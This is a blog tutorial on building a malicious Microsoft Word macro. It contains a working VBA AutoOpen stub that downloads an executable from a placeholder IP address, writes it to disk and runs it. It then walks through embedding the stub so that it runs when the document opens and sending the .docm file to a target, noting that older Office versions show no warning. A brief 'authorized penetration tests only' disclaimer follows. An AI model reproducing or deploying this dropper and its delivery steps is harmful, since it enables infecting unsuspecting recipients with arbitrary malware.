Creating Malicious Word Macros Tutorial : AutoRun Stub via Word Document

Creating Malicious Word Macros Tutorial : AutoRun Stub via Word Document

Free Give Away

Penetration testers often need to use social engineering attacks . What is more better than creating a Microsoft Office Word document that contains the payload and exploit in form of a Macro . That is easy … might be common now ….

What if the Word Macro would Auto start and execute the payload instantly ? This tutorial explains exactly how to do that .

We will start by creating a Word Macro .

Step 1: Create a payload. Macros use VBS for macros, so it’s not hard to make them, but many are already made. Here is an example DL and Execute payload:

Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://<IP>/<FILE>", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "file.exe", 2 '//overwrite
End With

Shell ("file.exe")

End Sub

A short VBA macro to download and execute a file
What the above code actually does is to Download a file and Execute it .

Step 2: Now that you have a payload, you need to enable the developer option.

To do that, simply go to

File -> Options -> Customize Ribbon -> Click on the box for “Developer”

Step 3: Go to the Developer tab and click on “Visual Basic”

Step 4: Double click on ThisDocument

Step 5: Paste this code into the field that appears

Code:
Private Sub Document_Open()
[payload]
End Sub

Replace [payload] with the VBS script you’re using in your macro.

Here is a screen shot for better understanding :

payload-word-doc

In this example, the payload will automatically open command prompt upon the opening of the word file.

Step 6: Now just save the file as filename.docm, send it to the target, and watch as it auto runs your stub. They may get a security warning about the macro, but if they’re running an older version of Microsoft Office, they won’t.

Please Feel free to post in comments in case you are stuck anywhere . This technique is for penetration testing and to be used only in Authorized Penetration tests by Penetration testers .

Purely for Educational Purposes !

Like and Share if you like the Post

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s